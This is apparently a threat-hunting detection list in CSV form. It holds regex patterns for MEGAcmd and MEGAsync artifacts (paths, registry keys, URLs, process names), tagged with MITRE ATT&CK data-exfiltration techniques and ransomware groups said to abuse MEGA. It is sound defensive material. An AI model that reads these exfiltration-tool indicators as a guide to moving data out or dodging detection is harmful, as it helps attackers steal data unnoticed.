"*https://mega.nz/folder/D0w0nYiY#egvjqP5R-anbBdsJg8QRVg*",".{0,1000}https\:\/\/mega\.nz\/folder\/D0w0nYiY\#egvjqP5R\-anbBdsJg8QRVg.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*https://mega.nz/folder/gflVFLhC#6neMkeJrt4dWboRTc1NLUg*",".{0,1000}https\:\/\/mega\.nz\/folder\/gflVFLhC\#6neMkeJrt4dWboRTc1NLUg.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*https://mega.nz/linux/repo/*.deb*",".{0,1000}https\:\/\/mega\.nz\/linux\/repo\/.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*killall mega-cmd*",".{0,1000}killall\smega\-cmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*killall mega-cmd-server*",".{0,1000}killall\smega\-cmd\-server.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*linux@mega.co.nz*",".{0,1000}linux\@mega\.co\.nz.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#email","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*MEGA/MEGAcmdUpdaterTask*",".{0,1000}MEGA\/MEGAcmdUpdaterTask.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#useragent","https://github.com/meganz/MEGAcmd/blob/d0a1e8e2c7d70fd951ef47d2d92243a65f0bb6eb/src/updater/Preferences.h#L6","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*MEGAcmd/* MegaClient/*",".{0,1000}MEGAcmd\/.{0,1000}\sMegaClient\/.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#useragent","https://github.com/meganz/MEGAcmd/blob/d0a1e8e2c7d70fd951ef47d2d92243a65f0bb6eb/UserGuide.md?plain=1#L374","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*pacman -U *megacmd*",".{0,1000}pacman\s\-U\s.{0,1000}megacmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*subprocess.Popen(MEGACMDSHELL*",".{0,1000}subprocess\.Popen\(MEGACMDSHELL.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"* megasync.exe*",".{0,1000}\smegasync\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* MEGAsyncSetup32.exe*",".{0,1000}\sMEGAsyncSetup32\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* MEGAsyncSetup64.exe*",".{0,1000}\sMEGAsyncSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.api.mega.co.nz*",".{0,1000}\.api\.mega\.co\.nz.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.static.mega.co.nz*",".{0,1000}\.static\.mega\.co\.nz.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/megasync.exe*",".{0,1000}\/megasync\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/MEGAsyncSetup32.exe*",".{0,1000}\/MEGAsyncSetup32\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/MEGAsyncSetup64.exe*",".{0,1000}\/MEGAsyncSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*[megaapi_impl.cpp:*",".{0,1000}\[megaapi_impl\.cpp\:.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*[megaclient.cpp:*",".{0,1000}\[megaclient\.cpp\:.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\appdata\local\megasync\*",".{0,1000}\\appdata\\local\\megasync\\.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ContextMenuHandlers\MEGA (Context menu)*",".{0,1000}\\ContextMenuHandlers\\MEGA\s\(Context\smenu\).{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\CurrentVersion\App Paths\MEGAsync*",".{0,1000}\\CurrentVersion\\App\sPaths\\MEGAsync.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\CurrentVersion\Uninstall\MEGAsync*",".{0,1000}\\CurrentVersion\\Uninstall\\MEGAsync.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\MEGA Website.lnk*",".{0,1000}\\MEGA\sWebsite\.lnk.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\MEGA Website.url*",".{0,1000}\\MEGA\sWebsite\.url.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\megaclient_statecache*.db*",".{0,1000}\\megaclient_statecache.{0,1000}\.db.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\megaclient_syncconfig_*",".{0,1000}\\megaclient_syncconfig_.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\megalimited-megasync_*",".{0,1000}\\megalimited\-megasync_.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\MEGAprivacyMEGAsync*",".{0,1000}\\MEGAprivacyMEGAsync.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","named pipe","10","10","N/A","N/A","N/A","N/A"
"*\MEGAsync.cfg*",".{0,1000}\\MEGAsync\.cfg.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\megasync.exe*",".{0,1000}\\megasync\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\MEGAsync.lnk*",".{0,1000}\\MEGAsync\.lnk.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\megasync.lock*",".{0,1000}\\megasync\.lock.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\MEGAsync.log*",".{0,1000}\\MEGAsync\.log.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\megasync.version*",".{0,1000}\\megasync\.version.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\MEGAsyncSetup32.exe*",".{0,1000}\\MEGAsyncSetup32\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\MEGAsyncSetup64.exe*",".{0,1000}\\MEGAsyncSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\MEGAupdater.exe*",".{0,1000}\\MEGAupdater\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ProgramData\megatmp.M1.txt*",".{0,1000}\\ProgramData\\megatmp\.M1\.txt.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ProgramData\megatmp.M2.txt*",".{0,1000}\\ProgramData\\megatmp\.M2\.txt.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ShellIconOverlayIdentifiers\_ MEGA (Pending)*",".{0,1000}\\ShellIconOverlayIdentifiers\\_\sMEGA\s\(Pending\).{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\ShellIconOverlayIdentifiers\_ MEGA (Synced)*",".{0,1000}\\ShellIconOverlayIdentifiers\\_\sMEGA\s\(Synced\).{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\ShellIconOverlayIdentifiers\_ MEGA (Syncing)*",".{0,1000}\\ShellIconOverlayIdentifiers\\_\sMEGA\s\(Syncing\).{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\Start Menu\Programs\MEGAsync\*",".{0,1000}\\Start\sMenu\\Programs\\MEGAsync\\.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\StartupTNotiMEGAsync.lnk*",".{0,1000}\\StartupTNotiMEGAsync\.lnk.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*'Company'>Mega Limited</Data>*",".{0,1000}\'Company\'\>Mega\sLimited\<\/Data\>.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://mega.nz/linux/repo/*",".{0,1000}https\:\/\/mega\.nz\/linux\/repo\/.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*MEGAsync Update Task*",".{0,1000}MEGAsync\sUpdate\sTask.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*MEGAsync.exe /*",".{0,1000}MEGAsync\.exe\s\/.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*MEGASYNC.EXE-*.pf*",".{0,1000}MEGASYNC\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*MEGAsync\ShellExtX64.dll*",".{0,1000}MEGAsync\\ShellExtX64\.dll.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*megasync-CentOS_*.x86_64.rpm*",".{0,1000}megasync\-CentOS_.{0,1000}\.x86_64\.rpm.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*megasync-CentOS_*.x86_64.rpm*",".{0,1000}megasync\-CentOS_.{0,1000}\.x86_64\.rpm.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*megasync-Debian_*_amd64.deb*",".{0,1000}megasync\-Debian_.{0,1000}_amd64\.deb.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*megasync-Fedora_*.x86_64.rpm*",".{0,1000}megasync\-Fedora_.{0,1000}\.x86_64\.rpm.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*megasync-openSUSE_Leap_*.x86_64.rpm*",".{0,1000}megasync\-openSUSE_Leap_.{0,1000}\.x86_64\.rpm.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
